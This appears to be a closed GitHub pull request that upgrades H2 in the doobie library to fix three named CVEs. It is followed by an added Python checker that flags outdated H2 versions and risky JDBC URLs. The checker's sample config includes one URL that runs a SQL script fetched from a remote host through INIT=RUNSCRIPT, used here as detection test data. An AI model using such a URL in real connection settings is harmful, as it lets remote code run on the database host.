
fix: upgrade H2 to 2.1.210 to resolve security vulnerabilities #2226

Closed
SanjayUG wants to merge 1 commit into typelevel:main from SanjayUG:#2223


Conversation

@SanjayUG

Upgrade H2 to resolve security vulnerabilities

Issue

The H2 module in Doobie depends on H2 version 1.4.200, which has critical security vulnerabilities:

  • CVE-2021-23463: XML External Entity (XXE) Injection via the org.h2.jdbc.JdbcSQLXML class object
  • CVE-2022-23221: Allows remote attackers to execute arbitrary code via a jdbc:h2:mem JDBC URL
  • CVE-2021-42392: An attacker may pass a JNDI driver name and a URL leading to LDAP or RMI servers, causing remote code execution

These vulnerabilities are fixed in H2 version 2.1.210 or above. There is no secure version in the 1.x line.

Changes

  • Updated H2 version from 1.4.200 to 2.1.210 in build.sbt
  • This affects all modules using H2:
    • core (test dependency)
    • h2 (main dependency)
    • h2-circe (transitive dependency)
    • hikari (test dependency)
    • specs2 (test dependency)
    • scalatest (test dependency)
    • munit (test dependency)
    • weaver (test dependency)
    • refined (test dependency)

Testing

  • Run the test suite to verify compatibility with H2 2.1.210
  • Test H2-specific features in the doobie-h2 module
  • Verify H2 connection pooling functionality
  • Check H2 array type support
  • Test H2 JSON support with circe

Breaking Changes

This is a major version upgrade of H2 (from 1.x to 2.x). Users should review the H2 2.x migration guide for any breaking changes that might affect their applications.

Security Impact

This update addresses critical security vulnerabilities that could allow:

  • XXE injection attacks
  • Remote code execution through JDBC URLs
  • Remote code execution through JNDI

Related

Fixes #2223
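
Added example, not part of this PR or of doobie's build: a small Python check a reviewer could run over a repository to confirm the upgrade landed and that no H2 JDBC URL carries the INIT=RUNSCRIPT clause, which is the mechanism behind CVE-2022-23221. The sbt coordinate pattern and both sample inputs below are constructed for the example; the 2.1.210 floor is the version named in the PR description.

```python
import re

# Oldest H2 release the PR description calls fixed; anything below it is flagged.
MIN_SAFE_H2 = (2, 1, 210)

# sbt coordinate for H2: "com.h2database" % "h2" % "<version>". H2 is a plain Java
# artifact, so "%" is expected, but a "%%" is tolerated as well.
_H2_DEP = re.compile(r'"com\.h2database"\s*%%?\s*"h2"\s*%\s*"(\d+(?:\.\d+)*)"')

# Any H2 JDBC URL up to the next whitespace or quote character.
_H2_URL = re.compile(r"jdbc:h2:[^\s\"']*", re.IGNORECASE)


def parse_version(version: str) -> tuple:
    """'1.4.200' -> (1, 4, 200), so versions compare numerically rather than lexically."""
    return tuple(int(part) for part in version.split("."))


def vulnerable_h2_versions(build_sbt: str) -> list:
    """Return every H2 version pinned in the given build text that is older than MIN_SAFE_H2."""
    return [v for v in _H2_DEP.findall(build_sbt) if parse_version(v) < MIN_SAFE_H2]


def risky_h2_urls(text: str) -> list:
    """Return H2 JDBC URLs whose INIT setting runs a script (the CVE-2022-23221 vector)."""
    flagged = []
    for url in _H2_URL.findall(text):
        # H2 URL settings follow the database name as ';'-separated KEY=VALUE pairs.
        for setting in url.split(";")[1:]:
            key, _, value = setting.partition("=")
            if key.strip().upper() == "INIT" and "RUNSCRIPT" in value.upper():
                flagged.append(url)
                break
    return flagged


# Constructed sample inputs for this example (not doobie's real build or config).
SAMPLE_BUILD_SBT = '''
libraryDependencies ++= Seq(
  "com.h2database" % "h2" % "1.4.200",
  "org.postgresql" % "postgresql" % "42.7.3"
)
'''

SAMPLE_CONFIG = '''
db.url = "jdbc:h2:mem:test;DB_CLOSE_DELAY=-1"
db.url = "jdbc:h2:mem:test;INIT=RUNSCRIPT FROM 'http://example.invalid/init.sql'"
'''

if __name__ == "__main__":
    print("vulnerable H2 versions:", vulnerable_h2_versions(SAMPLE_BUILD_SBT))
    print("risky H2 URLs:", risky_h2_urls(SAMPLE_CONFIG))
```

The coordinate regex only catches a version literal written inline; a build that pins the version through a `val` (common in sbt builds) needs the value resolved first, so treat an empty result as "nothing found inline", not as proof the dependency is safe. The URL check deliberately stops at the first whitespace or quote, which is enough to see the INIT=RUNSCRIPT prefix even when the script path that follows is quoted.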

@jatcwang (Collaborator)

Thanks for the attempt @SanjayUG. You can see many failures in CI which will need to be fixed.

@jatcwang jatcwang closed this Apr 18, 2025